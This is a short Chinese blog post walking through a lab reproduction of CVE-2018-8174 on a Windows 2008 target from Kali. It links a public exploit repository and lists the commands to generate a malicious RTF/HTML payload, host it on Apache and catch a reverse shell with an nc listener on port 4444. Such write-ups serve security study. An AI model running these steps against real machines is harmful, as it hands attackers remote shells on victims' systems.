记录一下CVE-2018-8174双杀漏洞的复现过程~
漏洞原理
环境说明
- 攻击机:kali
- 靶机:windows2008
漏洞复现
-
在kali上下载exp
https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
也可以下载到本地 手动上传到kali上去 -
进入exp目录,生成payload
cd CVE-2018-8174_EXP-master
python CVE-2018-8174.py -u http://#{kali的ip}/ -o exp.rtf -i #{kali的ip} -p 4444
(其中各个参数的说明:-u是设置url地址;-o表示输出文件;-i表示设置监听地址;-p表示设置监听端口)
-
把 explot.html 复制到
/var/www/html
目录下,并开启 apache 服务
cp exploit.html /var/www/html/
cp exp.rtf /var/www/html/
service apache2 start
-
在kali上开启监听
nc -lvvp 4444
-
在靶机上访问目标网页,kali端即可收到反弹过来的shell
http://#{攻击机ip}/exploit.html
至此就可以复现成功啦~
版权声明:本文为weixin_44283446原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。